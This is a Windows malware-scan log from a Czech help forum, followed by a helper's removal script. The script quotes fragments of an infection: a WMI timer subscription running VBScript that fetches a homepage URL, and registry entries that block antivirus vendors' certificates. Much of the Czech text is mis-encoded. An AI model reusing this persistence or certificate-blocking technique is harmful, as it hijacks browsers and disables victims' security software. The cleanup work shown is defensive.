FirewallRules: [TCP Query User{0056BA3C-C876-4AB1-B35C-9C770AFA7D0C}C:\program files\vietcong+no.cd.crack\vietcong.exe] => (Block) C:\program files\vietcong+no.cd.crack\vietcong.exe () [File not signed]
FirewallRules: [UDP Query User{CDC3411D-283E-45F1-997C-6F18660535AD}C:\program files\vietcong+no.cd.crack\vietcong.exe] => (Block) C:\program files\vietcong+no.cd.crack\vietcong.exe () [File not signed]
FirewallRules: [TCP Query User{538CBB5A-A209-4BE2-91E6-E578229223B4}C:\windows\syswow64\dpnsvr.exe] => (Block) C:\windows\syswow64\dpnsvr.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{8F46C7EC-5ECB-4FE8-BEE8-7F2407A5CE00}C:\windows\syswow64\dpnsvr.exe] => (Block) C:\windows\syswow64\dpnsvr.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{7F69616F-63B6-4CF7-AB09-D82813450F85}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Darkest of Days Demo\darkestofdays.exe () [File not signed]
FirewallRules: [{B1569663-2EED-4D76-AB87-956CE9A61B21}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Darkest of Days Demo\darkestofdays.exe () [File not signed]
FirewallRules: [TCP Query User{8EAF7FF1-16AE-477E-AEE5-243DE1BE9A0F}C:\games\world_of_tanks\wotlauncher.exe] => (Allow) C:\games\world_of_tanks\wotlauncher.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [UDP Query User{6F8CD927-5203-40F3-B21E-7DA516FBD1EB}C:\games\world_of_tanks\wotlauncher.exe] => (Allow) C:\games\world_of_tanks\wotlauncher.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [TCP Query User{D4187831-EADE-401B-804C-B4985E9EA7B5}C:\games\world_of_tanks\worldoftanks.exe] => (Allow) C:\games\world_of_tanks\worldoftanks.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [UDP Query User{745B8187-AEE5-4372-89AE-38C91DC29D63}C:\games\world_of_tanks\worldoftanks.exe] => (Allow) C:\games\world_of_tanks\worldoftanks.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [{65317BE0-B084-4E18-98CC-582E305E9A39}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{62FBABC5-024D-4301-AB9C-9452A271007A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{9BB2664B-9CD4-4E7C-B6DF-31E032C27114}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{38E030A9-3965-4C19-B85A-96A956A17D2F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{2B0152AF-43F3-430D-9E75-07877060FA3C}] => (Allow) C:\Program Files (x86)\Ubisoft\Techland\Call of Juarez - Bound in Blood\CoJBiBGame_x86.exe (Techland -> Techland)
FirewallRules: [{000840A5-E9E5-4070-AD70-BD08835702CA}] => (Allow) C:\Program Files (x86)\Ubisoft\Techland\Call of Juarez - Bound in Blood\CoJBiBGame_x86.exe (Techland -> Techland)
FirewallRules: [TCP Query User{37FFBF2D-0C6B-410A-89FD-5DFBB82276E2}C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe] => (Allow) C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe () [File not signed]
FirewallRules: [UDP Query User{4DBAA735-F0B8-4A52-B126-7181B0BE845C}C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe] => (Allow) C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe () [File not signed]
FirewallRules: [TCP Query User{7AE3E3A1-B436-413A-AEDA-C8AFAA5D2BCD}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Allow) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe (THQ Inc.) [File not signed]
FirewallRules: [UDP Query User{91EAA177-35A3-4AF4-805A-581AFA3F51E9}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Allow) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe (THQ Inc.) [File not signed]
FirewallRules: [TCP Query User{ED1F638F-E451-429B-98D6-67D5B3A4BF51}C:\games\world_of_tanks\wotlauncher.exe] => (Allow) C:\games\world_of_tanks\wotlauncher.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [UDP Query User{18467258-E4A2-4842-B2FA-D9CD1782F7A0}C:\games\world_of_tanks\wotlauncher.exe] => (Allow) C:\games\world_of_tanks\wotlauncher.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [TCP Query User{8E84A668-1AA4-4A6D-9DF1-7A89F6D55EA3}C:\games\world_of_tanks\worldoftanks.exe] => (Allow) C:\games\world_of_tanks\worldoftanks.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [UDP Query User{A4E9AFFB-12DC-4667-84B7-AA5A8FB03F1E}C:\games\world_of_tanks\worldoftanks.exe] => (Allow) C:\games\world_of_tanks\worldoftanks.exe (Wargaming.net LLP -> Wargaming.net) [File not signed]
FirewallRules: [{4E8C9063-5FE4-4595-AE51-C66685664272}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlestations Pacific - Demo\bspdemo.exe (Eidos Plc -> EIDOS)
FirewallRules: [{CC633B2E-8A5B-4486-9890-D4D29B975141}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlestations Pacific - Demo\bspdemo.exe (Eidos Plc -> EIDOS)
FirewallRules: [{0B089733-25AE-4971-8969-4C8770AD8928}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Wings of Prey Demo\launcher.exe (Gaijin Entertainment) [File not signed]
FirewallRules: [{61E94234-28B8-4105-8712-99D2AD892478}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Wings of Prey Demo\launcher.exe (Gaijin Entertainment) [File not signed]
FirewallRules: [TCP Query User{F28137E5-3694-4C89-830A-095B4E7C36BA}C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe] => (Allow) C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe () [File not signed]
FirewallRules: [UDP Query User{0F4B903E-F1F8-4CBE-BAEE-07060F035D9F}C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe] => (Allow) C:\program files (x86)\ubisoft\gearbox software\brothers in arms - hell's highway\binaries\biahh.exe () [File not signed]
FirewallRules: [TCP Query User{254EF6D7-44E4-4750-B932-50AAA208A674}C:\program files (x86)\warcraft iii\war3.exe] => (Block) C:\program files (x86)\warcraft iii\war3.exe (Blizzard Entertainment) [File not signed]
FirewallRules: [UDP Query User{496F1EEA-1683-4C80-8812-554310DD78C9}C:\program files (x86)\warcraft iii\war3.exe] => (Block) C:\program files (x86)\warcraft iii\war3.exe (Blizzard Entertainment) [File not signed]
FirewallRules: [TCP Query User{012743A7-F4A7-4C56-98E9-76E477112C43}C:\program files (x86)\css\counter-strike source\hl2.exe] => (Block) C:\program files (x86)\css\counter-strike source\hl2.exe () [File not signed]
FirewallRules: [UDP Query User{0E6E9637-7C34-45AB-876A-C0DCBA7C3481}C:\program files (x86)\css\counter-strike source\hl2.exe] => (Block) C:\program files (x86)\css\counter-strike source\hl2.exe () [File not signed]
FirewallRules: [TCP Query User{79D6499D-1CB3-4783-9F1A-BEB2959BD6EE}C:\bestgames\counter-strike 1.6\hl.exe] => (Allow) C:\bestgames\counter-strike 1.6\hl.exe (Valve) [File not signed]
FirewallRules: [UDP Query User{CE7F6B25-9762-40FA-841D-0A2440DFC84F}C:\bestgames\counter-strike 1.6\hl.exe] => (Allow) C:\bestgames\counter-strike 1.6\hl.exe (Valve) [File not signed]
FirewallRules: [{BC0F26F9-B3D7-4186-887C-546DB34D5738}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{4F6BB88C-4AF9-4B8F-8135-6E3624A3208A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [TCP Query User{F896E933-572E-490B-B94B-76CA5A7BF17D}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin (The Document Foundation) [File not signed]
FirewallRules: [UDP Query User{B85DB95C-4D1B-4206-84CB-8B762BE82226}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin (The Document Foundation) [File not signed]
FirewallRules: [{22CEAD00-603E-4F6B-BB96-DF467AEE1D20}] => (Allow) C:\WINDOWS\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{7CA3E41B-1AE5-4D81-86FB-D775491F5F81}] => (Allow) C:\WINDOWS\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{17FA4FD6-CC17-46AC-9927-62A18248780E}] => (Allow) C:\WINDOWS\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [TCP Query User{B53D76DE-C05D-4DB4-A477-1E4468E57B52}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{6D9EEFC5-8583-483E-AEC2-6517284644E7}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{82ECBD6C-F70A-415E-9FB3-41BEEF19225D}] => (Allow) C:\WINDOWS\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{BEB4EEBE-4936-4730-A954-92839929F90C}] => (Allow) C:\WINDOWS\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{385AF33F-8FE9-40AC-A283-DF6A1E2ABC61}] => (Allow) C:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa_setup.exe (Electronic Arts Inc.) [File not signed]
FirewallRules: [{E0857A25-CB37-43E6-9565-60217EF63BCF}] => (Allow) C:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa_setup.exe (Electronic Arts Inc.) [File not signed]
FirewallRules: [{A8A4AF2D-7915-4A6C-A840-EDC5B3AF4A6F}] => (Allow) C:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa.exe (Electronic Arts -> Electronic Arts Inc.)
FirewallRules: [{608095AD-D8FD-42A6-BDDB-2313CB49CFC6}] => (Allow) C:\Program Files (x86)\Origin Games\Medal of Honor Pacific Assault\mohpa.exe (Electronic Arts -> Electronic Arts Inc.)
FirewallRules: [TCP Query User{272C686D-A3B3-432A-87B1-A9193632FFD0}C:\program files\need for speed underground 2\need for speed underground 2.exe] => (Allow) C:\program files\need for speed underground 2\need for speed underground 2.exe () [File not signed]
FirewallRules: [UDP Query User{ABBED1A7-66DB-4C35-A3FA-B1B0B3C6B030}C:\program files\need for speed underground 2\need for speed underground 2.exe] => (Allow) C:\program files\need for speed underground 2\need for speed underground 2.exe () [File not signed]
FirewallRules: [TCP Query User{9D3457A1-E386-4DA3-82E5-EBBA69CF8EF2}C:\bestgames\counter-strike 1.6\hl.exe] => (Block) C:\bestgames\counter-strike 1.6\hl.exe (Valve) [File not signed]
FirewallRules: [UDP Query User{5EDF1ABE-9F45-4732-84C9-FF5C27C43202}C:\bestgames\counter-strike 1.6\hl.exe] => (Block) C:\bestgames\counter-strike 1.6\hl.exe (Valve) [File not signed]
FirewallRules: [{A4676607-3187-412F-9D62-0052028896C2}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s2suj9kcb25111.dat () [File not signed]
FirewallRules: [{FCA43FE9-0673-4559-AD98-20D413A26796}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s2suj9kcb25111.dat () [File not signed]
FirewallRules: [{FE7E10A1-2D41-481D-B952-2F339A675E0D}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s2suj9kcb25111.dat () [File not signed]
FirewallRules: [{B91FABF4-72D5-4A1E-8EAB-0E79D8F3DC23}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s2suj9kcb25111.dat () [File not signed]
FirewallRules: [TCP Query User{E5A70F91-23C9-4882-B8D5-B36D523CD235}C:\riot games\league of legends\leagueclient.exe] => (Allow) C:\riot games\league of legends\leagueclient.exe (Riot Games, Inc. -> )
FirewallRules: [UDP Query User{BBF6061D-863C-445A-B6CE-66D7391E0420}C:\riot games\league of legends\leagueclient.exe] => (Allow) C:\riot games\league of legends\leagueclient.exe (Riot Games, Inc. -> )
FirewallRules: [TCP Query User{75D7BEC9-18F5-44DF-B616-F36B1618A24F}C:\riot games\league of legends\leagueclient.exe] => (Allow) C:\riot games\league of legends\leagueclient.exe (Riot Games, Inc. -> )
FirewallRules: [UDP Query User{0BE16C34-C787-47BB-B06E-093E006EB1DC}C:\riot games\league of legends\leagueclient.exe] => (Allow) C:\riot games\league of legends\leagueclient.exe (Riot Games, Inc. -> )
FirewallRules: [TCP Query User{E03CF743-B44B-482F-A3DC-231E10A1092E}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{FFFA7C12-D58B-4B21-8B4E-7B4413B5D2CF}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [{6E2A124B-2064-4854-98B3-066DF792EC84}] => (Allow) %systemroot%\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)

==================== Restore Points =========================

19-07-2019 13:31:12 Removed Google Update Helper
29-07-2019 21:06:16 Windows Update
30-07-2019 00:34:51 Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727
30-07-2019 00:35:48 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727
31-07-2019 01:05:50 AdwCleaner_BeforeCleaning_31/07/2019_01:05:43

==================== Faulty Device Manager Devices =============

Name: Ralink Bluetooth PCIe Adapter
Description: Ralink Bluetooth PCIe Adapter
Class Guid: {d2de069d-7286-420b-baf8-225d700ce748}
Manufacturer: Ralink Technology Corp.
Service: rtbth
Problem: : Windows cannot load the device driver for this hardware. The driver may be corrupted or missing. (Code 39)
Resolution: Reasons for this error include a driver that is not present; a binary file that is corrupt; a file I/O problem, or a driver that references an entry point in another binary file that could not be loaded.
Uninstall the driver, and then click "Scan for hardware changes" to reinstall or upgrade the driver.

==================== Event log errors: =========================

Application errors:
==================
Error: (07/31/2019 01:47:05 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 4859

Error: (07/31/2019 01:47:05 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 4859

Error: (07/31/2019 01:47:05 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (07/30/2019 10:31:32 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program Wow.exe verze 4.3.4.15595 pĹ™estal spolupracovat se systĂ©mem Windows a byl ukonÄŤen. Chcete-li zjistit, zda je k dispozici vĂce informacĂ o tomto problĂ©mu, vyhledejte historii problĂ©mu v ovlĂˇdacĂm panelu Centrum akcĂ.

ID procesu: 938

ÄŚas spuĹˇtÄ›nĂ: 01d54715465cdfaf

ÄŚas ukonÄŤenĂ: 4294967295

Cesta k aplikaci: C:\Users\Radim\Desktop\World of Warcraft Cataclysm 4.3.4\Wow.exe

ID hlĂˇĹˇenĂ: 00a78c1f-b309-11e9-805e-b4b52f8204d5

ĂšplnĂ˝ nĂˇzev chybujĂcĂho balĂÄŤku:

ID aplikace souvisejĂcĂ s chybujĂcĂm balĂÄŤkem:

Error: (07/30/2019 05:06:28 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 5016

Error: (07/30/2019 05:06:28 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 5016

Error: (07/30/2019 05:06:28 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (07/30/2019 05:06:27 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 3781

System errors:
=============
Error: (07/31/2019 01:06:32 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: SluĹľba Origin Web Helper Service byla neoÄŤekĂˇvanÄ› ukonÄŤena. Tento stav nastal jiĹľ 1krĂˇt.

Error: (07/31/2019 01:06:25 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: SluĹľba HP Service byla neoÄŤekĂˇvanÄ› ukonÄŤena. Tento stav nastal jiĹľ 1krĂˇt.

Error: (07/31/2019 01:06:25 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: SluĹľba AMD External Events Utility byla neoÄŤekĂˇvanÄ› ukonÄŤena. Tento stav nastal jiĹľ 1krĂˇt.

Error: (07/31/2019 01:06:25 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: SluĹľba Audio Service byla neoÄŤekĂˇvanÄ› ukonÄŤena. Tento stav nastal jiĹľ 1krĂˇt.

Error: (07/31/2019 01:06:25 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: SluĹľba Apple Mobile Device byla neÄŤekanÄ› ukonÄŤena. Stalo se to 1 krĂˇt. NĂˇsledujĂcĂ opravnĂˇ akce bude spuĹˇtÄ›na za 60000 milisekund: Restartovat sluĹľbu.

Error: (07/31/2019 01:06:25 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: SluĹľba LicCtrl Service byla neoÄŤekĂˇvanÄ› ukonÄŤena. Tento stav nastal jiĹľ 1krĂˇt.

Error: (07/31/2019 01:06:25 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: SluĹľba Intel(R) ME Service byla neoÄŤekĂˇvanÄ› ukonÄŤena. Tento stav nastal jiĹľ 1krĂˇt.

Error: (07/31/2019 01:06:25 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: SluĹľba HP Support Assistant Service byla neÄŤekanÄ› ukonÄŤena. Stalo se to 1 krĂˇt. NĂˇsledujĂcĂ opravnĂˇ akce bude spuĹˇtÄ›na za 60000 milisekund: Restartovat sluĹľbu.

Windows Defender:
===================================
Date: 2014-11-27 21:21:00.958
Description:
ProhledĂˇvĂˇnĂ Windows Defender bylo zastaveno pĹ™ed dokonÄŤenĂm.
ID prohledĂˇvĂˇnĂ: {3598E1E8-509B-448D-9F28-410E0B0A5AA5}
Typ prohledĂˇvĂˇnĂ: AntimalwarovĂ˝ program
Parametry prohledĂˇvĂˇnĂ: RychlĂ© prohledĂˇvĂˇnĂ
UĹľivatel: NT AUTHORITY\SYSTEM

Date: 2014-11-26 14:58:20.024
Description:
ProhledĂˇvĂˇnĂ Windows Defender bylo zastaveno pĹ™ed dokonÄŤenĂm.
ID prohledĂˇvĂˇnĂ: {DBD3A4C0-B79D-4D17-9E45-D04CB6EC5BEA}
Typ prohledĂˇvĂˇnĂ: AntimalwarovĂ˝ program
Parametry prohledĂˇvĂˇnĂ: RychlĂ© prohledĂˇvĂˇnĂ
UĹľivatel: NT AUTHORITY\SYSTEM

Date: 2014-11-26 14:48:41.240
Description:
ProhledĂˇvĂˇnĂ Windows Defender bylo zastaveno pĹ™ed dokonÄŤenĂm.
ID prohledĂˇvĂˇnĂ: {BCC9A0C4-C9EC-4867-9200-74C7FAC1CC47}
Typ prohledĂˇvĂˇnĂ: AntimalwarovĂ˝ program
Parametry prohledĂˇvĂˇnĂ: RychlĂ© prohledĂˇvĂˇnĂ
UĹľivatel: NT AUTHORITY\SYSTEM

Date: 2014-11-23 13:06:01.780
Description:
ProhledĂˇvĂˇnĂ Windows Defender bylo zastaveno pĹ™ed dokonÄŤenĂm.
ID prohledĂˇvĂˇnĂ: {3297DFFE-B253-4847-809B-4741D32948F5}
Typ prohledĂˇvĂˇnĂ: AntimalwarovĂ˝ program
Parametry prohledĂˇvĂˇnĂ: RychlĂ© prohledĂˇvĂˇnĂ
UĹľivatel: NT AUTHORITY\SYSTEM

Date: 2014-11-23 12:31:44.371
Description:
ProhledĂˇvĂˇnĂ Windows Defender bylo zastaveno pĹ™ed dokonÄŤenĂm.
ID prohledĂˇvĂˇnĂ: {2B4D8610-91E7-48B8-ACB0-3B19DC54C8F7}
Typ prohledĂˇvĂˇnĂ: AntimalwarovĂ˝ program
Parametry prohledĂˇvĂˇnĂ: RychlĂ© prohledĂˇvĂˇnĂ
UĹľivatel: NT AUTHORITY\SYSTEM

Date: 2014-11-23 11:41:38.983
Description:
ProhledĂˇvĂˇnĂ Windows Defender zjistilo chybu pĹ™i pokusu o aktualizaci podpisĹŻ.
NovĂˇ verze podpisu:
PĹ™edchozĂ verze podpisu: 1.189.487.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: AntivirovĂ˝ program
Typ aktualizace: ĂšplnĂ©
UĹľivatel: NT AUTHORITY\SYSTEM
AktuĂˇlnĂ verze modulu:
PĹ™edchozĂ verze modulu: 1.1.11202.0
KĂłd chyby: 0x80240016
Popis chyby

Ĺ™i zjiĹˇĹĄovĂˇnĂ aktualizacĂ doĹˇlo k neoÄŤekĂˇvanĂ˝m potĂĹľĂm. Informace o instalaci nebo Ĺ™eĹˇenĂ potĂĹľĂ s aktualizacemi naleznete v nĂˇpovÄ›dÄ› a podpoĹ™e.

Date: 2014-11-23 11:41:38.983
Description:
ProhledĂˇvĂˇnĂ Windows Defender zjistilo chybu pĹ™i pokusu o aktualizaci podpisĹŻ.
NovĂˇ verze podpisu:
PĹ™edchozĂ verze podpisu: 1.189.487.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: AntivirovĂ˝ program
Typ aktualizace: ĂšplnĂ©
UĹľivatel: NT AUTHORITY\SYSTEM
AktuĂˇlnĂ verze modulu:
PĹ™edchozĂ verze modulu: 1.1.11202.0
KĂłd chyby: 0x80240016
Popis chyby

Ĺ™i zjiĹˇĹĄovĂˇnĂ aktualizacĂ doĹˇlo k neoÄŤekĂˇvanĂ˝m potĂĹľĂm. Informace o instalaci nebo Ĺ™eĹˇenĂ potĂĹľĂ s aktualizacemi naleznete v nĂˇpovÄ›dÄ› a podpoĹ™e.

Date: 2014-11-17 18:47:46.928
Description:
ProhledĂˇvĂˇnĂ Windows Defender zjistilo chybu pĹ™i pokusu o aktualizaci podpisĹŻ.
NovĂˇ verze podpisu:
PĹ™edchozĂ verze podpisu: 1.187.2317.0
Zdroj aktualizace: Server Microsoft Update
Typ podpisu: AntivirovĂ˝ program
Typ aktualizace: ĂšplnĂ©
UĹľivatel: NT AUTHORITY\SYSTEM
AktuĂˇlnĂ verze modulu:
PĹ™edchozĂ verze modulu: 1.1.11104.0
KĂłd chyby: 0x80240016
Popis chyby

Ĺ™i zjiĹˇĹĄovĂˇnĂ aktualizacĂ doĹˇlo k neoÄŤekĂˇvanĂ˝m potĂĹľĂm. Informace o instalaci nebo Ĺ™eĹˇenĂ potĂĹľĂ s aktualizacemi naleznete v nĂˇpovÄ›dÄ› a podpoĹ™e.

CodeIntegrity:
===================================

Date: 2019-07-27 20:57:26.770
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-26 19:15:41.306
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-24 12:39:00.236
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-19 22:27:24.774
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-19 21:39:45.017
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-19 17:19:19.601
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-16 20:53:35.955
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-15 13:18:05.256
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\WINDOWS\System32\drivers\atikmpag.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

BIOS: Hewlett-Packard 68IRR Ver. F.60 01/15/2015
Motherboard: Hewlett-Packard 17F6
Processor: Intel(R) Pentium(R) CPU 2020M @ 2.40GHz
Percentage of memory in use: 38%
Total physical RAM: 8075.45 MB
Available physical RAM: 4941.05 MB
Total Virtual: 9355.45 MB
Available Virtual: 6059.96 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:680.44 GB) (Free:137.73 GB) NTFS
Drive f: () (Removable) (Total:29.32 GB) (Free:9.68 GB) FAT32

\\?\Volume{1f8b2cff-7fc1-4bf4-a5b8-4b4cea060f9f}\ (ObnovenĂ) (Fixed) (Total:0.29 GB) (Free:0.27 GB) NTFS
\\?\Volume{9cc4e974-0124-45b5-9f74-42f4920ddb47}\ () (Fixed) (Total:0.44 GB) (Free:0.12 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 698.6 GB) (Disk ID: 00C200C1)

Partition: GPT.

========================================================
Disk: 1 (Protective MBR) (Size: 29.3 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt ============================

#8 Příspěvek od **Rudy** » 31 črc 2019 14:57

Otevřte poznámkový blok a zkopírujte do něj:

Start

CloseProcesses:
ShellExecuteHooks: No Name - {E080595E-3381-11E7-A376-64006A5CFC23} - -> No File
ContextMenuHandlers1: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => -> No File
ContextMenuHandlers1: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers1: [JZContextMenuExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => -> No File
ContextMenuHandlers2: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers4: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => -> No File
ContextMenuHandlers2: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers4: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"ASEC\"",Filter="\\.\root\subscription:__EventFilter.Name=\"EventFilter sethomePage2\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__EventFilter->EventFilter sethomePage2::[Query => Select * From __timerevent Where TimerId = "SethomePage Interval Timer"] <==== ATTENTION
Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemOb (the data entry has 2410 more characters).] <==== ATTENTION
HKLM\software\microsoft\Windows\CurrentVersion\Telephony\Providers => ProviderFileName2 -> ndptsp.tsp (No File)
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
